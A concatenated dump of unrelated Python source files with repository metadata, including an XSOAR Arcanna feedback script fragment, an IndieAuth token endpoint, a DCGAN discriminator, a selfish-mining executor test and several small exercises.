user = demisto.args().get("closing_user", None)
notes = demisto.args().get("closing_notes", None)
ret = send_arcanna_feedback(notes, args_closing_reason, user, event_id, job_id)
return_results(ret)
else:
demisto.executeCommand("arcanna-get-feedback-field", {})
feedback_field, feedback_field_value = extract_feedback_information()
close_reason = incident.get('closeReason', None)
close_notes = incident.get('closeNotes')
owner = incident.get('owner', None)
closing_user = incident.get('closingUserId', None)
demisto.debug(f"Values supplied to command are{feedback_field} "
f"close_reason={close_reason} owner={owner} closing_user={closing_user} "
f"close_notes={close_notes}")
# if feedback_field_value is not empty get that value, else use the default closeReason value
if feedback_field_value:
close_reason = feedback_field_value
survey_user = get_value_from_context(key="Closure_Reason_Survey.Answers.name")
# Arcanna-Generic-Playbook usage.Prevent sending Arcanna Feedback if no analyst reviewed the incident
if str(close_notes).startswith(ARCANNA_AUTO_CLOSED_TICKET_PLAYBOOK_PLACEHOLDER):
return_results(
f'Skipping Sending Arcanna event feedback for incident_id={incident_id}.No Analyst Reviewed')
return
if not closing_user and not close_notes and not close_reason:
return_results(
f'Skipping Sending Arcanna event feedback for incident_id={incident_id}.No Analyst Reviewed')
return
if not close_reason:
raise Exception(
"Trying to use Arcanna post-processing script without providing value for the closing field")
closing_user = add_closing_user_information(closing_user, owner, survey_user)
ret = send_arcanna_feedback(close_notes, close_reason, closing_user, event_id, job_id)
return_results(ret)
except Exception as ex:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Failed to execute ArcannaFeedbackPostProcessingScript. Error: {str(ex)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
run_arcanna_send_feedback()
| 40.193277 | 113 | 0.672381 |
f1cc3b2fba226f56954313dab2b6f19c75123cbc
| 819 |
py
|
Python
|
modeling/model_utils/backbone2head.py
|
UESTC-Liuxin/SkmtSeg
|
1251de57fae967aca395644d1c70a9ba0bb52271
|
[
"Apache-2.0"
] | 2 |
2020-12-22T08:40:05.000Z
|
2021-03-30T08:09:44.000Z
|
modeling/model_utils/backbone2head.py
|
UESTC-Liuxin/SkmtSeg
|
1251de57fae967aca395644d1c70a9ba0bb52271
|
[
"Apache-2.0"
] | null | null | null |
modeling/model_utils/backbone2head.py
|
UESTC-Liuxin/SkmtSeg
|
1251de57fae967aca395644d1c70a9ba0bb52271
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
@description:
@author: LiuXin
@contact: [email protected]
@Created on: 2020/12/30 下午4:16
"""
def get_inchannels(backbone):
"""
:return:
"""
if (backbone in ['resnet18', 'resnet34', 'resnet50', 'resnet101',
'resnext50_32x4d', 'wide_resnet50_2', 'wide_resnet101_2']):
in_channels = [2048,1024, 512, 256,64]
elif backbone == 'mobilenet':
in_channels = [320, 32, 24, 16]
else:
raise NotImplementedError
return in_channels
def get_low_level_feat(backbone,inputs):
if (backbone == 'xception'): # 不同的backbone有不同的输出,处理不同
low_level_feat = inputs[1]
elif (backbone in ['resnet50', 'resnet101','wide_resnet50_2']):
low_level_feat = inputs[3]
else:
NotImplementedError
return low_level_feat
| 23.4 | 70 | 0.632479 |
8d17a70c6a50bfa1882bef0d2c971669ab7dd61f
| 788 |
py
|
Python
|
Curso-Em-Video-Python/2Exercicios/071_Simulador_de_caixa_eletronico.py
|
pedrohd21/Cursos-Feitos
|
b223aad83867bfa45ad161d133e33c2c200d42bd
|
[
"MIT"
] | null | null | null |
Curso-Em-Video-Python/2Exercicios/071_Simulador_de_caixa_eletronico.py
|
pedrohd21/Cursos-Feitos
|
b223aad83867bfa45ad161d133e33c2c200d42bd
|
[
"MIT"
] | null | null | null |
Curso-Em-Video-Python/2Exercicios/071_Simulador_de_caixa_eletronico.py
|
pedrohd21/Cursos-Feitos
|
b223aad83867bfa45ad161d133e33c2c200d42bd
|
[
"MIT"
] | null | null | null |
titulo = 'BANC Actuli'
print('='*40)
print(titulo.center(40))
print('='*40)
saque = int(input('Qual o valor a sacar? R$'))
n = nota = nota1 = nota20 = nota50 = nota10 = 0
while n < 2:
if saque >= 50:
nota= saque // 50
nota50 += 1
saque -= 50
elif saque >= 20:
nota = saque // 20
nota20 += 1
saque -= 20
elif saque >= 10:
nota = saque // 10
nota10 += 1
saque -= 10
else:
nota = saque // 1
saque -= 1
nota1 += 1
if saque == 0:
break
print(f'Total de {nota50} cédulas de R$ 50')
print(f'Total de {nota20} cédulas de R$ 20')
print(f'Total de {nota10} cédulas de R$ 10')
print(f'Total de {nota1} cédulas de R$ 1')
print('='*40)
print('Volte Sempre ao Banc Actuali!!')
| 23.878788 | 47 | 0.530457 |
a5e067b4890b4317639f81e7612be10d175e1883
| 395 |
py
|
Python
|
python/contextlib/contextlib_exitstack_callbacks.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/contextlib/contextlib_exitstack_callbacks.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/contextlib/contextlib_exitstack_callbacks.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
"""
ExitStack also supports arbitrary callbacks for closing a context,
making it easy to clean up resources that are not controlled via a
context manager
"""
import contextlib
def callback(*args, **kwargs):
print('closing callback({}, {})'.format(args, kwargs))
with contextlib.ExitStack() as stack:
stack.callback(callback, 'arg1', 'arg2')
stack.callback(callback, arg3='val3')
| 24.6875 | 66 | 0.724051 |
a5f2622b2579f3d9c0c1aea05dd3d5fae58ede28
| 515 |
pyde
|
Python
|
sketches/primespiral/primespiral.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 4 |
2018-06-03T02:11:46.000Z
|
2021-08-18T19:55:15.000Z
|
sketches/primespiral/primespiral.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | null | null | null |
sketches/primespiral/primespiral.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 3 |
2019-12-23T19:12:51.000Z
|
2021-04-30T14:00:31.000Z
|
p = 2
f = 1
MAXITER = 60000
def setup():
size(600, 600)
this.surface.setTitle("Primzahl-Spirale")
background(51)
frameRate(1000)
def draw():
colorMode(HSB)
global p, f, i
translate(width/2, height/2)
noStroke()
fill(p%255, 255, 255)
# Satz von Wilson
if f%p%2:
x = p*sin(p)*0.005
y = p*cos(p)*0.005
ellipse(x, y, 2, 2)
p += 1
f *= (p-2)
if p > MAXITER:
print("I did it, Babe!")
noLoop()
| 17.758621 | 45 | 0.485437 |
9e018187e85f7ee1e34428212b0e780da0574e36
| 832 |
py
|
Python
|
skill/db.py
|
Lanseuo/luftdaten-skill
|
4d11a80d627d86b5afcd8a9ae1d7ccac3659b35a
|
[
"MIT"
] | 1 |
2019-03-25T07:18:13.000Z
|
2019-03-25T07:18:13.000Z
|
skill/db.py
|
Lanseuo/luftdaten-skill
|
4d11a80d627d86b5afcd8a9ae1d7ccac3659b35a
|
[
"MIT"
] | null | null | null |
skill/db.py
|
Lanseuo/luftdaten-skill
|
4d11a80d627d86b5afcd8a9ae1d7ccac3659b35a
|
[
"MIT"
] | null | null | null |
import boto3
def get_user(user_id):
dynamodb = boto3.resource("dynamodb")
table = dynamodb.Table("luftdaten-skill-users")
result = table.get_item(
Key={
"user_id": user_id
}
)
return result.get("Item")
def add_user(user_id):
dynamodb = boto3.resource("dynamodb")
table = dynamodb.Table("luftdaten-skill-users")
table.put_item(
Item={
"user_id": user_id
}
)
def set_sensor_id(user_id, sensor_id):
dynamodb = boto3.resource("dynamodb")
table = dynamodb.Table("luftdaten-skill-users")
table.update_item(
Key={
"user_id": user_id
},
UpdateExpression="set sensor_id=:s",
ExpressionAttributeValues={
":s": sensor_id
},
ReturnValues="UPDATED_NEW"
)
| 19.809524 | 51 | 0.580529 |
5fe5e49621d153a96d132abc8d6685390aaa592c
| 433 |
py
|
Python
|
envs/rpg/entities/spike.py
|
etigerstudio/zilong-on-fire
|
5144a471b2d39ea38a47d394e648de00dd13cd8b
|
[
"MIT"
] | 2 |
2021-01-07T01:10:49.000Z
|
2022-01-21T09:37:16.000Z
|
envs/rpg/entities/spike.py
|
etigerstudio/zilong-on-fire
|
5144a471b2d39ea38a47d394e648de00dd13cd8b
|
[
"MIT"
] | null | null | null |
envs/rpg/entities/spike.py
|
etigerstudio/zilong-on-fire
|
5144a471b2d39ea38a47d394e648de00dd13cd8b
|
[
"MIT"
] | null | null | null |
from envs.rpg.entity import Entity
class Spike(Entity):
REPRESENTATION = 1
SPIKE_REWARD = -1
def start(self, world):
pass
def update(self, world):
actor = world.get_actor_entity()
if not actor.pose == actor.Pose.JUMPING and \
actor.position == self.position:
actor.destroy(world)
return self.SPIKE_REWARD
def destroy(self, world):
pass
| 21.65 | 53 | 0.595843 |
27d0a39f208253da9f3ee353f6c6404d09729caf
| 738 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/education/doctype/student_group/test_student_group.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/education/doctype/student_group/test_student_group.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/education/doctype/student_group/test_student_group.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
from frappe.utils.make_random import get_random
class TestStudentGroup(unittest.TestCase):
def test_student_roll_no(self):
doc = frappe.get_doc({
"doctype": "Student Group",
"student_group_name": "_Test Student Group R",
"group_based_on": "Activity"
}).insert()
student_list = []
while len(student_list) < 3:
s = get_random("Student")
if s not in student_list:
student_list.append(s)
doc.extend("students", [{"student":d} for d in student_list])
doc.save()
self.assertEqual(max([d.group_roll_number for d in doc.students]), 3)
| 26.357143 | 71 | 0.719512 |
8b4c11b2fd015278e60cce1ac7e834bd64716946
| 477 |
py
|
Python
|
src/bo4e/enum/tarifart.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 1 |
2022-03-02T12:49:44.000Z
|
2022-03-02T12:49:44.000Z
|
src/bo4e/enum/tarifart.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 21 |
2022-02-04T07:38:46.000Z
|
2022-03-28T14:01:53.000Z
|
src/bo4e/enum/tarifart.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | null | null | null |
# pylint:disable=missing-module-docstring
from bo4e.enum.strenum import StrEnum
class Tarifart(StrEnum):
"""
Die Tarifart wird verwendet zur Charakterisierung von Zählern und daraus resultierenden Tarifen.
"""
EINTARIF = "EINTARIF" #: Eintarif
ZWEITARIF = "ZWEITARIF" #: Zweitarif
MEHRTARIF = "MEHRTARIF" #: Mehrtarif
SMART_METER = "SMART_METER" #: Smart Meter Tarif
LEISTUNGSGEMESSEN = "LEISTUNGSGEMESSEN" #: Leistungsgemessener Tarif
| 29.8125 | 100 | 0.721174 |
9a681c609cbc0159e7e33c8e7411b5bb4af609f4
| 6,909 |
py
|
Python
|
code/tests/test_executor.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | null | null | null |
code/tests/test_executor.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | null | null | null |
code/tests/test_executor.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | 1 |
2019-06-05T09:10:30.000Z
|
2019-06-05T09:10:30.000Z
|
import unittest
from mock import MagicMock
from chain import Block
import test_util
from strategy import BlockOrigin, Action, ActionException
from strategy.executor import Executor
from bitcoin.core import CBlock
class ExecutorTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(ExecutorTest, self).__init__(*args, **kwargs)
self.executor = None
self.networking = None
self.first_block_chain_a = None
self.second_block_chain_a = None
self.first_block_chain_b = None
self.second_block_chain_b = None
def setUp(self):
self.networking = MagicMock()
self.executor = Executor(self.networking)
self.first_block_chain_b = Block(CBlock(), BlockOrigin.public)
self.first_block_chain_b.height = 1
self.first_block_chain_b.prevBlock = test_util.genesis_block
self.first_block_chain_b.cached_hash = '1b'
self.second_block_chain_b = Block(CBlock(), BlockOrigin.public)
self.second_block_chain_b.height = 2
self.second_block_chain_b.prevBlock = self.first_block_chain_b
self.second_block_chain_b.cached_hash = '2b'
self.first_block_chain_a = Block(CBlock(), BlockOrigin.private)
self.first_block_chain_a.height = 1
self.first_block_chain_a.prevBlock = test_util.genesis_block
self.first_block_chain_a.cached_hash = '1a'
self.second_block_chain_a = Block(CBlock(), BlockOrigin.private)
self.second_block_chain_a.height = 2
self.second_block_chain_a.prevBlock = self.first_block_chain_a
self.second_block_chain_a.cached_hash = '2a'
def test_match_same_height(self):
self.executor.execute(Action.match, self.first_block_chain_a, self.first_block_chain_b)
self.assertTrue(self.networking.send_inv.called)
blocks = [block.hash() for block in self.networking.send_inv.call_args[0][0]]
self.assertEqual(len(blocks), 2)
self.assertTrue('1a' in blocks)
self.assertTrue('1b' in blocks)
def test_match_lead_private(self):
self.executor.execute(Action.match, self.second_block_chain_a, self.first_block_chain_b)
self.assertTrue(self.networking.send_inv.called)
blocks = [block.hash() for block in self.networking.send_inv.call_args[0][0]]
self.assertEqual(len(blocks), 2)
self.assertTrue('1a' in blocks)
self.assertTrue('1b' in blocks)
def test_match_lead_public(self):
private_tip = Block(CBlock(), None)
private_tip.height = 1
public_tip = Block(CBlock(), None)
public_tip.height = 2
with self.assertRaisesRegexp(ActionException, "private tip.*must >= then public tip.*match.*"):
self.executor.execute(Action.match, private_tip, public_tip)
def test_override_lead_public(self):
private_tip = Block(CBlock(), None)
private_tip.height = 1
public_tip = Block(CBlock(), None)
public_tip.height = 2
with self.assertRaisesRegexp(ActionException, "private tip.*must > then public tip.*override.*"):
self.executor.execute(Action.override, private_tip, public_tip)
def test_override_same_height(self):
private_tip = Block(CBlock(), None)
private_tip.height = 2
public_tip = Block(CBlock(), None)
public_tip.height = 2
with self.assertRaisesRegexp(ActionException, "private tip.*must > then public tip.*override.*"):
self.executor.execute(Action.override, private_tip, public_tip)
def test_override_lead_private(self):
self.executor.execute(Action.override, self.second_block_chain_a, self.first_block_chain_b)
self.assertTrue(self.networking.send_inv.called)
blocks = [block.hash() for block in self.networking.send_inv.call_args[0][0]]
self.assertEqual(len(blocks), 3)
self.assertTrue('1a' in blocks)
self.assertTrue('2a' in blocks)
self.assertTrue('1b' in blocks)
def test_override_two_blocks_lead_private(self):
third_block_chain_a = Block(CBlock(), BlockOrigin.private)
third_block_chain_a.height = 3
third_block_chain_a.prevBlock = self.second_block_chain_a
third_block_chain_a.cached_hash = '3a'
self.executor.execute(Action.override, third_block_chain_a, self.first_block_chain_b)
self.assertTrue(self.networking.send_inv.called)
blocks = [block.hash() for block in self.networking.send_inv.call_args[0][0]]
self.assertEqual(len(blocks), 3)
self.assertTrue('1a' in blocks)
self.assertTrue('2a' in blocks)
self.assertTrue('1b' in blocks)
def test_adopt_private_lead(self):
private_tip = Block(CBlock(), None)
private_tip.height = 3
public_tip = Block(CBlock(), None)
public_tip.height = 2
with self.assertRaisesRegexp(ActionException, "public tip.*must > then private tip.*adopt.*"):
self.executor.execute(Action.adopt, private_tip, public_tip)
def test_adopt_same_height(self):
private_tip = Block(CBlock(), None)
private_tip.height = 2
public_tip = Block(CBlock(), None)
public_tip.height = 2
with self.assertRaisesRegexp(ActionException, "public tip.*must > then private tip.*adopt.*"):
self.executor.execute(Action.adopt, private_tip, public_tip)
def test_adopt_lead_public(self):
self.executor.execute(Action.adopt, self.first_block_chain_a, self.second_block_chain_b)
self.assertTrue(self.networking.send_inv.called)
blocks = [block.hash() for block in self.networking.send_inv.call_args[0][0]]
self.assertEqual(len(blocks), 2)
self.assertTrue('1b' in blocks)
self.assertTrue('2b' in blocks)
def test_adopt_two_blocks_lead_public(self):
third_block_chain_b = Block(CBlock(), BlockOrigin.public)
third_block_chain_b.height = 3
third_block_chain_b.prevBlock = self.second_block_chain_b
third_block_chain_b.cached_hash = '3b'
self.executor.execute(Action.adopt, self.first_block_chain_a, third_block_chain_b)
self.assertTrue(self.networking.send_inv.called)
blocks = [block.hash() for block in self.networking.send_inv.call_args[0][0]]
self.assertEqual(len(blocks), 3)
self.assertTrue('1b' in blocks)
self.assertTrue('2b' in blocks)
self.assertTrue('3b' in blocks)
def test_execute_action_check_if_transfer_allowed_is_set(self):
self.executor.execute(Action.match, self.first_block_chain_a, self.first_block_chain_b)
self.assertTrue(self.networking.send_inv.called)
self.assertEqual(len(self.networking.send_inv.call_args[0][0]), 2)
for block in self.networking.send_inv.call_args[0][0]:
self.assertTrue(block.transfer_allowed)
| 37.754098 | 105 | 0.694312 |
d059add8381fa878a349fe53f182a26ba2c75c1b
| 2,544 |
py
|
Python
|
Problems/Depth-First Search/medium/pseudoPalindromicPathsBT/pseudo_palindromic_paths_bt.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | 1 |
2021-08-16T14:52:05.000Z
|
2021-08-16T14:52:05.000Z
|
Problems/Depth-First Search/medium/pseudoPalindromicPathsBT/pseudo_palindromic_paths_bt.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | null | null | null |
Problems/Depth-First Search/medium/pseudoPalindromicPathsBT/pseudo_palindromic_paths_bt.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | null | null | null |
from collections import defaultdict
from typing import Optional
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
def pseudoPalindromicPaths(self, root: Optional[TreeNode]) -> int:
self.dict_freq = defaultdict(int)
self.Pal, self.Res = 0, 0
def dfs(cur_node: Optional[TreeNode]):
if not cur_node:
return
cur, pal = self.dict_freq[cur_node.val], self.Pal
self.Pal = self.Pal - 1 if cur == 1 else self.Pal + 1
self.dict_freq[cur_node.val] = (cur + 1) % 2
if not cur_node.left and not cur_node.right and self.Pal <= 1:
self.Res += 1
dfs(cur_node.left)
dfs(cur_node.right)
self.Pal, self.dict_freq[cur_node.val] = pal, cur
dfs(root)
return self.Res
# Recursive bitwise
# def pseudoPalindromicPaths(self, root: Optional[TreeNode]) -> int:
# self.ans = 0
#
# def dfs(cur_node: Optional[TreeNode], path: int):
#
# path ^= (1 << cur_node.val)
#
# if not cur_node.left and not cur_node.right:
# self.ans += path & (path - 1) == 0
#
# if cur_node.left:
# dfs(cur_node.left, path)
#
# if cur_node.right:
# dfs(cur_node.right, path)
#
# dfs(root, 0)
#
# return self.ans
# Iterative bitwise
# def pseudoPalindromicPaths(self, root: Optional[TreeNode]) -> int:
# ans = 0
#
# stack = [(root, 0)]
# while stack:
# cur_node, path = stack.pop()
# path ^= (1 << cur_node.val)
# if not cur_node.left and not cur_node.right:
# ans += path & (path - 1) == 0
# continue
#
# if cur_node.left:
# stack.append((cur_node.left, path))
#
# if cur_node.right:
# stack.append((cur_node.right, path))
#
# return ans
# Using set
# def pseudoPalindromicPaths(self, root: Optional[TreeNode]) -> int:
# self.ans = 0
#
# def dfs(cur_node, path_set=set()):
# paths = copy.deepcopy(path_set)
# if cur_node.val in paths:
# paths.remove(cur_node.val)
# else:
# paths.add(cur_node.val)
#
# if not cur_node.left and not cur_node.right:
# self.ans += len(paths) <= 1
# return
#
# if cur_node.left:
# dfs(cur_node.left, paths)
#
# if cur_node.right:
# dfs(cur_node.right, paths)
#
# dfs(root)
#
# return self.ans
| 25.44 | 70 | 0.564072 |
d0b3f810f96e7869495cccef7980d54e19b6a8a1
| 4,878 |
py
|
Python
|
publ/tokens.py
|
PlaidWeb/Publ
|
67efc5e32bf25dbac72a83d1167de038b79db5a7
|
[
"MIT"
] | 27 |
2018-11-30T21:32:26.000Z
|
2022-03-20T19:46:25.000Z
|
publ/tokens.py
|
PlaidWeb/Publ
|
67efc5e32bf25dbac72a83d1167de038b79db5a7
|
[
"MIT"
] | 249 |
2018-09-30T07:04:37.000Z
|
2022-03-29T04:31:00.000Z
|
publ/tokens.py
|
PlaidWeb/Publ
|
67efc5e32bf25dbac72a83d1167de038b79db5a7
|
[
"MIT"
] | 4 |
2019-03-01T06:46:13.000Z
|
2019-06-30T17:45:46.000Z
|
""" IndieAuth token endpoint """
import json
import logging
import time
import typing
import flask
import itsdangerous
import requests
import werkzeug.exceptions as http_error
from .config import config
LOGGER = logging.getLogger(__name__)
def signer():
""" Gets the signer/validator for the tokens """
return itsdangerous.URLSafeSerializer(flask.current_app.secret_key)
def get_token(id_url: str, lifetime: int, scope: str = None) -> str:
""" Gets a signed token for the given identity"""
token = {'me': id_url}
if scope:
token['scope'] = scope
return signer().dumps((token, int(time.time() + lifetime)))
def parse_token(token: str) -> typing.Dict[str, str]:
""" Parse a bearer token to get the stored data """
try:
ident, expires = signer().loads(token)
except itsdangerous.BadData as error:
LOGGER.error("Got token parse error: %s", error)
flask.g.token_error = 'Invalid token'
raise http_error.Unauthorized('Invalid token') from error
if expires < time.time():
LOGGER.info("Got expired token for %s", ident['me'])
flask.g.token_error = "Token expired"
raise http_error.Unauthorized("Token expired")
return ident
def request(user):
""" Called whenever an authenticated access fails; marks authentication
as being upgradeable.
Currently this is unused by Publ itself, but a site can make use of it to
e.g. add a ``WWW-Authenticate`` header or the like in a post-request hook.
"""
if not user:
flask.g.needs_auth = True
def send_auth_ticket(subject: str,
resource: str,
endpoint: str,
scope: str = None):
""" Initiate the TicketAuth flow """
def _submit():
scopes = set(scope.split() if scope else [])
scopes.add('ticket')
ticket = get_token(subject, config.ticket_lifetime, ' '.join(scopes))
req = requests.post(endpoint, data={
'ticket': ticket,
'resource': resource,
'subject': subject
})
LOGGER.info("Auth ticket sent to %s for %s: %d %s",
endpoint, subject, req.status_code, req.text)
# Use the indexer's threadpool to issue the ticket in the background
flask.current_app.indexer.submit(_submit)
def indieauth_endpoint():
""" IndieAuth token endpoint """
import authl.handlers.indieauth
if 'me' in flask.request.args:
# A ticket request is being made
me_url = flask.request.args['me']
try:
endpoint, _ = authl.handlers.indieauth.find_endpoint(me_url,
rel='ticket_endpoint')
except RuntimeError:
endpoint = None
if not endpoint:
raise http_error.BadRequest("Could not get ticket endpoint")
LOGGER.info("endpoint: %s", endpoint)
send_auth_ticket(me_url, flask.request.url_root, endpoint)
return "Ticket sent", 202
if 'grant_type' in flask.request.form:
# token grant
if flask.request.form['grant_type'] == 'ticket':
# TicketAuth
if 'ticket' not in flask.request.form:
raise http_error.BadRequest("Missing ticket")
ticket = parse_token(flask.request.form['ticket'])
LOGGER.info("Redeeming ticket for %s; scopes=%s", ticket['me'],
ticket['scope'])
scopes = set(ticket.get('scope', '').split())
if 'ticket' not in scopes:
raise http_error.BadRequest("Missing 'ticket' scope")
scopes.remove('ticket')
scope = ' '.join(scopes)
token = get_token(ticket['me'], config.token_lifetime, scope)
response = {
'access_token': token,
'token_type': 'Bearer',
'me': ticket['me'],
'expires_in': config.token_lifetime,
'refresh_token': get_token(ticket['me'],
config.token_lifetime,
ticket['scope'])
}
if scope:
response['scope'] = scope
return json.dumps(response), {'Content-Type': 'application/json'}
raise http_error.BadRequest("Unknown grant type")
if 'action' in flask.request.form:
raise http_error.BadRequest()
if 'Authorization' in flask.request.headers:
# ticket verification
parts = flask.request.headers['Authorization'].split()
if parts[0].lower() == 'bearer':
token = parse_token(parts[1])
return json.dumps(token), {'Content-Type': 'application/json'}
raise http_error.Unauthorized("Invalid authorization header")
raise http_error.BadRequest()
| 32.738255 | 87 | 0.590816 |
d0f919ad9cfe633b4feb6fd20132a3b2590ac918
| 928 |
py
|
Python
|
7_DeepLearning-GANs/02_DCGAN/Discriminator.py
|
felixdittrich92/DeepLearning-tensorflow-keras
|
2880d8ed28ba87f28851affa92b6fa99d2e47be9
|
[
"Apache-2.0"
] | null | null | null |
7_DeepLearning-GANs/02_DCGAN/Discriminator.py
|
felixdittrich92/DeepLearning-tensorflow-keras
|
2880d8ed28ba87f28851affa92b6fa99d2e47be9
|
[
"Apache-2.0"
] | null | null | null |
7_DeepLearning-GANs/02_DCGAN/Discriminator.py
|
felixdittrich92/DeepLearning-tensorflow-keras
|
2880d8ed28ba87f28851affa92b6fa99d2e47be9
|
[
"Apache-2.0"
] | null | null | null |
'''
Discriminator - bewertet die vom Generator erzeugten Bilder ob Real oder Fake
'''
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import *
from tensorflow.keras.optimizers import *
def build_discriminator(img_shape):
model = Sequential() #28x28
model.add(Conv2D(64, kernel_size=5, strides=2, input_shape=img_shape, padding="same")) #14x14
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.3))
model.add(Conv2D(128, (5, 5), strides=(2, 2), padding='same'))
model.add(LeakyReLU())
model.add(Dropout(0.3))
model.add(Flatten()) #4x4x256 => 16 x 256 = 2^4 x 2^8 = 2^12 = 4096
model.add(Dense(1))
model.add(Activation("sigmoid")) # < 0.5 Klasse 0 > 0.5 Klasse 1
model.summary()
img = Input(shape=img_shape)
d_pred = model(img) # model auf bild aufrufen
return Model(inputs=img, outputs=d_pred) # beeinhaltet komplettes Modell
| 34.37037 | 97 | 0.688578 |
f5df78ca1be55fa27098e6eff282bddb6a88e868
| 1,606 |
py
|
Python
|
tssb/tssb.py
|
sharadmv/tssb
|
9385ea9ab199070034a36f92b6520152f801823a
|
[
"MIT"
] | null | null | null |
tssb/tssb.py
|
sharadmv/tssb
|
9385ea9ab199070034a36f92b6520152f801823a
|
[
"MIT"
] | null | null | null |
tssb/tssb.py
|
sharadmv/tssb
|
9385ea9ab199070034a36f92b6520152f801823a
|
[
"MIT"
] | null | null | null |
import numpy as np
import scipy.stats as stats
from dist import Distribution
from gem import LazyGEM
def depth_weight(a, l):
def dpw(j):
return l ** j * a
return dpw
class TSSB(Distribution):
def __init__(self, index=(), depth=0, alpha=depth_weight(1.0, 0.5), gamma=0.2):
self.index = index
self.depth = depth
self.alpha = alpha
self.gamma = gamma
self.nu = stats.beta(1, self.alpha(self.depth)).rvs()
self.psi = LazyGEM(self.gamma)
self.children = []
self.cur_index = -1
def get_child(self, key):
if self.cur_index < key:
while self.cur_index < key:
self.cur_index += 1
self.children.append(TSSB(
index=self.index + (self.cur_index,),
depth=self.depth + 1,
alpha=self.alpha,
gamma=self.gamma
))
return self.children[key]
def uniform_index(self, u):
if u < self.nu:
return self.index
u = (u - self.nu) / (1.0 - self.nu)
i, right_weight = self.psi.uniform_index(u)
child, weight = self.get_child(i), self.psi[i]
left_weight = right_weight - weight
u = (u - left_weight) / (weight)
return child.uniform_index(u)
def sample_one(self):
return self.uniform_index(np.random.random())
def __repr__(self):
if self.index:
return '-'.join(map(str, self.index))
return '-'
if __name__ == "__main__":
t = TSSB(alpha=depth_weight(1, 1), gamma=1)
| 28.678571 | 83 | 0.552927 |
de2575a582c58f8fcfcec0a91bd84c250eee87cd
| 250 |
py
|
Python
|
Python/Courses/Python-Tutorials.Telusko/00.Fundamentals/07.06-for-Loop-Over-Dictionary.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
Python/Courses/Python-Tutorials.Telusko/00.Fundamentals/07.06-for-Loop-Over-Dictionary.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
Python/Courses/Python-Tutorials.Telusko/00.Fundamentals/07.06-for-Loop-Over-Dictionary.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
dt = {"shihab": "programmer", "mahinur": "graphic designer", "jion": "civil engineer"}
for i in dt:
print(i, end=" ")
print()
for pro in dt.values():
print(pro, end=" ")
print("\n")
for i, pro in dt.items():
print(i,": ", pro)
print()
| 17.857143 | 86 | 0.568 |
a0ce94f0ee33cd51c8683516ee3c5585045ad570
| 1,879 |
py
|
Python
|
imwievaluation/spreadsheet.py
|
ESchae/IMWIEvaluation
|
2fa661711b7b65cba25c1fa9ba69e09e75c7655f
|
[
"MIT"
] | null | null | null |
imwievaluation/spreadsheet.py
|
ESchae/IMWIEvaluation
|
2fa661711b7b65cba25c1fa9ba69e09e75c7655f
|
[
"MIT"
] | null | null | null |
imwievaluation/spreadsheet.py
|
ESchae/IMWIEvaluation
|
2fa661711b7b65cba25c1fa9ba69e09e75c7655f
|
[
"MIT"
] | 1 |
2019-10-19T10:11:17.000Z
|
2019-10-19T10:11:17.000Z
|
import gspread
from oauth2client.service_account import ServiceAccountCredentials as sa_creds
# TODO: after generating, save key + title / lecturer for later use!
class SpreadsheetHandler(object):
""" Class to handle data transfer via Google Spreadsheets Python API.
Uses gspread: https://github.com/burnash/gspread.
"""
def __init__(self, creds_file='client_secret.json'):
scope = ['https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive']
